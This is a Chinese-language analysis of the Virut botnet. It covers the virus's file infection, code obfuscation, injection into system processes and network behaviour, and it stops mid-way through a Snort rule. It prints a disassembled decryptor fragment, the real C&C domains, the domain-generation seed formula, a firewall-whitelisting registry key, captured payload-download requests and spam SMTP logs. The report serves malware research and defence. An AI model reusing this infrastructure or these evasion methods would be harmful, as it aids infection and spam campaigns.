Virut僵尸網(wǎng)絡(luò)分析

Virut僵尸網(wǎng)絡(luò)分析-bynEINEI/2011.10一virut概述二virut核心組成部分三virut文件感染四virut網(wǎng)絡(luò)行為分析五衍生文件的討論六目前一些結(jié)論一virut概述Virut病毒最早出現(xiàn)在2006年，目前最活躍的是virut.ce變種。經(jīng)過多個(gè)版本的發(fā)展已經(jīng)成為windows系統(tǒng)下很復(fù)雜的感染性病毒。因?yàn)関irut包含多態(tài)引擎的感染方式，所以比起zeus，spyeye等僵尸網(wǎng)絡(luò)，virut更難于清除。同時(shí)近期的virut變種也改進(jìn)的連接病毒服務(wù)器的方式，防止這些域名被安全公司加入黑名單列表，在virut的下載模塊中，加入了“遠(yuǎn)程插件”的功能，這樣，即使在一天之內(nèi)病毒也可能會有多種行為上的變化。二virut核心組成部分從病毒的payloads層面上看，virut分為3部分1）感染可執(zhí)行文件2）感染系統(tǒng)進(jìn)程3）連接病毒服務(wù)器下載新的模塊。從客戶端感染情況來看，virut的網(wǎng)絡(luò)行為部分又存在固定的組成部分，一般都會下載這幾個(gè)固定的進(jìn)程文件。1）多實(shí)例的f1ku.exe進(jìn)程，尋找遠(yuǎn)端的病毒服務(wù)器。2）i6g8xx.exe負(fù)責(zé)連接中國地區(qū)的病毒服務(wù)器。3）VRT_.TMP進(jìn)程代碼注入到多個(gè)svchost進(jìn)程實(shí)例當(dāng)中，開啟病毒服務(wù)端連接。下載的可變部分包括，1）端口掃描部分2）病毒的進(jìn)程保護(hù)3）執(zhí)行模塊（“遠(yuǎn)程插件“）4）更新服務(wù)端列表。這些進(jìn)程每隔一段時(shí)間就會有一些變化，但大致上功能相似。（一）對于固定部分的進(jìn)程F1ku.exe，i6g8xs.exe，VRT_.TMP,每一個(gè)程序即便單獨(dú)運(yùn)行，也都會達(dá)到和virut母體感染一樣的效果，它同樣會下載回來virut的其他組成部分,構(gòu)成完整的感染整體。三virut文件感染對本地文件的感染，virut大體上有兩種策略：1簡單結(jié)構(gòu)的PE文件，asm編寫或小于2個(gè)節(jié)區(qū)。2高級語言的編譯器生成的多2個(gè)節(jié)區(qū)的PE文件。第1中情況的OEP感染，第2種情況的OEP感染，修改了宿主程序的API調(diào)用代碼。宿主文件的正常結(jié)構(gòu)一個(gè)被感染的文件，執(zhí)行流程如下。關(guān)于virut解密方面的詳細(xì)討論可參考kaspersky的《Reviewofthevirus.win32.virut.ceMalwareSample》。我們觀察到的一些情況，在virut改進(jìn)的版本中，解密方式上變化不大，使用自下向上的方式解密自身代碼。在獲得kernel32的基址及其他的大量循環(huán)代碼中，加入anti-vm的方式，virut插入一條無效的loop指令，同時(shí)設(shè)置ecx為一個(gè)很大值（例如0xffff），使得反病毒虛擬機(jī)的執(zhí)行步數(shù)超過通常設(shè)定的最大執(zhí)行步數(shù)，從而可能導(dǎo)致提前退出仿真檢測。Virut的解密器在隱藏代碼方面是存在弱點(diǎn)的，病毒作者并沒有隱藏好解密后跳轉(zhuǎn)的代碼，我們可以在解密代碼的最下方直接發(fā)現(xiàn)這句沒有被混淆的跳轉(zhuǎn)指令。從下面的一個(gè)代碼片段中我們可以了解virut的主要代碼混淆方手段。00408A256BC00Fimuleax,eax,0F【junkcode】00408A2850pusheax【junkcode】00408A290FB647FBmovzxeax,byteptrds:[edi-5]【junkcode】00408A2DF7D8negeax【junkcode】00408A2F010424adddwordptrss:[esp],eax【junkcode】00408A3283EFF1subedi,-0F----------------||edi+100408A358D7FF2leaedi,dwordptrds:[edi-E]--------|00408A38807FFB0Acmpbyteptrds:[edi-5],0A00408A3C58popeaxjunkcode【junkcode】00408A3D^77E6jashort111.00408A25第一遍解密完成后，virut會跳向解密完成后的節(jié)代碼中，在這里進(jìn)行二次解密。它會把自身的payload代碼注入到系統(tǒng)PID等于4的進(jìn)程中，一般是winlogon.exe進(jìn)程，后面我們也將以winlogon來描述。Virut會對winlogon中注入的代碼做亂序處理，它自身會存儲的一張類似hash的表，里面記錄可以進(jìn)行亂序的指令的偏移，每次隨機(jī)選擇一個(gè)索引值，進(jìn)行兩條指令的交換，以此達(dá)到對抗防病毒軟件的內(nèi)存掃描功能。同時(shí)會繼續(xù)對explorer.exe進(jìn)行代碼注入，同時(shí)hook掉重要的API函數(shù)。當(dāng)系統(tǒng)有新的進(jìn)程運(yùn)行時(shí)，virut可以選擇繼續(xù)感染新進(jìn)程，或直接kill新進(jìn)程。四Virut的網(wǎng)絡(luò)行為Virut的網(wǎng)絡(luò)行為部分比較復(fù)雜，在一定程度上對抗了安全軟件的黑名單策略。由于病毒程序之間的相互保護(hù)，使得感染后的清除工作也變得復(fù)雜。1通過修改注冊表項(xiàng)，關(guān)閉系統(tǒng)防火墻的報(bào)警策略，同時(shí)修改了本機(jī)的host文件HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\??\C:\WINDOWS\system32\winlogon.exe:*:enabled:@shell32.dll,-12目前virut母體文件會保存2個(gè)病毒IRC服務(wù)器，連接的C&C域名為ilo.brenz.pl

（目前活躍的，在德國）&&

ant.trenz.pl。連通后，指示機(jī)器人下載和安裝其他惡意程序。使用的格式如下，NICK[randomstring]

USER020501..:%randomosversionJOIN#.[ID]例如，7FF839A24E49434B20NICK7FF839B26A676A796D6F64610A55534552207398jgjymoda.USERsvirut會不停的開啟線程，變換“USER”前面的字符串去連接C&C服務(wù)器。3virut對外連接的服務(wù)器是通過暴力搜索方式獲得的，這不算是新的技術(shù)，但確是有效的方法：隨機(jī)的種子數(shù)，采用當(dāng)天的日期，通過GetSystemTime獲得，1天之內(nèi)最多產(chǎn)生10,000個(gè)域名。Virut內(nèi)部有很多的對稱加密算法，開始的Key，多以這個(gè)種子為開始。使用Year，month，date這算3個(gè)字段。種子的計(jì)算方式seed=((year*100)+month)*100+date。根據(jù)這個(gè)種子，先計(jì)算4組，6位字符的隨機(jī)域名。7FF8705CC77CEFAF67686469786F2E636F6D0074莬鋯.t7FF8706C656D6E6E672E636F6D00656F6D797861.eomyxa7FF8707C2E636F6D006F6C78786D762E636F6D00..根據(jù)產(chǎn)生的這組域名，迭代計(jì)算產(chǎn)生0x64組域名，每一組繼續(xù)迭代直到產(chǎn)生10,000組為止。Virut會嘗試同這些域名進(jìn)行連接，當(dāng)然它還會對這些域名進(jìn)行檢測，以確保是自己的病毒服務(wù)器。這方面的更多的討論可參考賽門鐵克的報(bào)告《W32.Virut:UsingCryptographytoPreventDomainHijacking》當(dāng)這些服務(wù)器在活躍的情況下，viurt將下載新的惡意程序到用戶機(jī)器上。五衍生文件的討論Virut的衍生文件包括相對固定的3個(gè)進(jìn)程和一些可變的進(jìn)程。這些進(jìn)程幾乎都有共同的一個(gè)功能，就是任意一個(gè)進(jìn)程運(yùn)行，都會通過網(wǎng)絡(luò)下載會其它的進(jìn)程。達(dá)到和病毒母體運(yùn)行后的同樣效果。f1ku.exe文件是virut最先下載回來的惡意程序，virut病毒母體對文件/進(jìn)程感染后就已經(jīng)退到了“幕后“。f1ku才是發(fā)動后續(xù)行為動作的“指揮官”。F1ku看起來像是一個(gè)被virut感染了的VB程序，我并不理解病毒作者為什么這樣做，或許是作者不相信加殼程序的免殺能力。F1ku第一次運(yùn)行時(shí)只完成一個(gè)啟動工作，他會把他自身拷貝的臨時(shí)目錄下，通過參數(shù)來運(yùn)行自身的多個(gè)實(shí)例。格式如下F1ku.exepath–b|varyinglengthstring例如：001B29AC|CommandLine="C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\f1ku.exe-dE0F3AB41995ECB1471803F18490DBEBCD30AA9CE98F963BB6B598BCF389BF8A19215A6877048F592EC82E549115C37D3F5F09D70AC005D73DDBF1392028B731D96CD3FB9BC6BCD7C2B29CF905D9936E053AA6F5074F64A4E46F348"...目前我們還無法獲得這些可變字符串的具體含義。F1ku的主要目的是開啟多份自身實(shí)例，連接遠(yuǎn)端病毒服務(wù)器，下載新的進(jìn)程執(zhí)行。同時(shí)f1ku也注入winlogon進(jìn)程，關(guān)閉系統(tǒng)防火墻等等輔助功能。每一個(gè)f1ku都會連就不同的服務(wù)端請求下載其他進(jìn)程，例如不同的請求如下: GET/list.php?c=B4AC885F94224AE64DAAC6EE0346C213D049B58E0B3A69C2DC9ACA9C5FF2F6D9DFE10E13F3845D3386FFC45E0D4897B5778D4CBB9FE6A5854372&v=2&t=.3906061HTTP/1.1User-Agent:Mozilla/4.0(compatible;MSIE6.0.2900.2180;WindowsNT5.1.2600)Host:Connection:Keep-AliveCache-Control:no-cacheGET/.smokeldr/client.exe?t=1.124209E-02HTTP/1.1User-Agent:Mozilla/4.0(compatible;MSIE6.0.2900.2180;WindowsNT5.1.2600)Host:4Connection:Keep-AliveCache-Control:no-cache一旦遠(yuǎn)端服務(wù)器有響應(yīng)，f1ku也會上傳用戶機(jī)器使用的網(wǎng)絡(luò)運(yùn)營商地址。220-mx1.rttv.ruESMTP220######EHLO0.250-mx1.rttv.ru250-8BITMIME250SIZE52428800同時(shí)，下載第二批惡意程序到用戶機(jī)器上。另外固定下載的程序是VMP_.TMP進(jìn)程，它主要負(fù)責(zé)開啟多個(gè)svchost進(jìn)程，同時(shí)注入代碼到svchost中。VMP_.TMP功能較多，1）連接9（拉脫維亞），下載第3批次的惡意程序。2）用SSL的方式連接1（加拿大）。3）發(fā)送固定格式的數(shù)據(jù)給不同的服務(wù)器（目前尚不能解密其具體含義）4）連接多個(gè)遠(yuǎn)端的服務(wù)器，等待接收指令，如2（莫斯科）20（德國）等等。5）連接0（哥倫比亞大學(xué)），發(fā)送垃圾郵件。220tory.peterlink.ruESMTPSendmail8.14.3/8.14.3;Wed,9Nov201112:15:55+0300(MSK)EHLO0.250-tory.peterlink.ruHello0.[8](maybeforged),pleasedtomeetyou250-ENHANCEDSTATUSCODES250-PIPELINING250-EXPN250-VERB250-8BITMIME250-SIZE30000000250-ETRN250-DELIVERBY250HELPMAILFROM:<disdaining6@mail.ru>BODY=8BITMIMERCPTTO:<588.73257449254093@bsv.spb.ru>RCPTTO:<592.73239036663218@bsv.spb.ru>RCPTTO:<592.73240050598953@bsv.spb.ru>RCPTTO:<592.73244147538375@bsv.spb.ru>RCPTTO:<592.73244236894890@bsv.spb.ru>RCPTTO:<592.73244652523109@bsv.spb.ru>RCPTTO:<592.73244752745781@bsv.spb.ru>RCPTTO:<592.73245461088343@bsv.spb.ru>RCPTTO:<592.73245737878921@bsv.spb.ru>DATA2502.1.0<disdaining6@mail.ru>...Senderok4514.7.1Greylistinginaction,pleasecomebacklater4514.7.1Greylistinginaction,pleasecomebacklater4514.7.1Greylistinginaction,pleasecomebacklater4514.7.1Greylistinginaction,pleasecomebacklater4514.7.1Greylistinginaction,pleasecomebacklater4514.7.1Greylistinginaction,pleasecomebacklater4514.7.1Greylistinginaction,pleasecomebacklater4514.7.1Greylistinginaction,pleasecomebacklater4514.7.1Greylistinginaction,pleasecomebacklater5035.0.0NeedRCPT(recipient)值得注意的一個(gè)地方是，在virut的衍生物中對外的一些連接顯得比較謹(jǐn)慎，是通過暴力搜索可用端口方式來進(jìn)行通信，下圖是連接9（烏克蘭）對于第3批次的下載衍生物來說一個(gè)一個(gè)重要的功能就是下回了f1ku.exe文件并運(yùn)行。另外自身的一些機(jī)器硬件信息也會被上傳到病毒的控制端。在衍生物中，xu2eo3u1h.exe是個(gè)很有特點(diǎn)進(jìn)程(這個(gè)名字也是可變的)，它的主要任務(wù)就是download一個(gè)dll文件到用戶機(jī)器，并加載執(zhí)行。這個(gè)dll文件是有個(gè)標(biāo)準(zhǔn)的導(dǎo)出接口init.我們發(fā)現(xiàn)了一些有趣的現(xiàn)象,服務(wù)端對這個(gè)dll文件更新非常及時(shí)，甚至1天之內(nèi)就會有變化。而xu2eo3u1h.exe僅是個(gè)加載器的功能，有效代碼來自于這個(gè)dll文件。這對我們分析來說是一個(gè)弊端，這經(jīng)常是可變化的，甚至不能對此有完整的結(jié)論。xu2eo3u1h對他要加載的dll文件是有校驗(yàn)的，這個(gè)校驗(yàn)值可能來自于它下載的服務(wù)端，也就是我們無法偽造一個(gè)導(dǎo)出接口函數(shù)為init的dll文件讓xu2eo3u1h加載。甚至xu2eo3u1h昨天下載回來的dll文件，今天就不能被再次使用。3）開啟多個(gè)線程和遠(yuǎn)端的服務(wù)端通信，如5720902/ajax.php,但每次接收的數(shù)據(jù)包中僅包含1個(gè)字節(jié)的數(shù)據(jù)，程序內(nèi)部再把他們拼成一段完成的數(shù)據(jù)，這顯然是浪費(fèi)資源及時(shí)間的，穩(wěn)定性也不高，同時(shí)也異于正常http網(wǎng)絡(luò)通信形式。但在我們測試的多個(gè)帶有防火墻功能的安全軟件中是沒有報(bào)警的。4）其中一個(gè)下載的進(jìn)程，會檢測一個(gè)特定的信號量是否存在（例如“\BaseNamedObjects\rqrtVt“），不存在的話注入到winlogon中。否則不停的開啟子進(jìn)程對外連接，但這可能是個(gè)bug，它消耗盡了用戶計(jì)算機(jī)的資源。對于另外的一些下載回來的進(jìn)程就是不停的尋址有效的服務(wù)器。并進(jìn)行連接，他們的功能是比較單一的。Virut病毒并不喜歡隱藏，這主要依賴他能感染系統(tǒng)新創(chuàng)建的進(jìn)程，及衍生物之間的相互保護(hù)，以此來對抗防病毒軟件。中毒的機(jī)器看起來會有很多異常的進(jìn)程出現(xiàn)。六目前的一些結(jié)論1)virut僵尸網(wǎng)絡(luò)，目前的主要靠病毒母體的感染文件方式傳播，在最新的病毒變種中，沒有使用U盤感染，p2p共享或其它方式。2)最新的IRC服務(wù)器地址在母體文件中，阻斷這一個(gè)來源即可防止用戶成為被控的僵尸主機(jī)。同時(shí)，我們也查詢了snort對virut的檢測規(guī)則，但他們只有2009年的檢測規(guī)則。方法是對病毒IRC服務(wù)的域名進(jìn)行匹配，然后報(bào)警，這樣的規(guī)則在snort中共有3條。alertudp$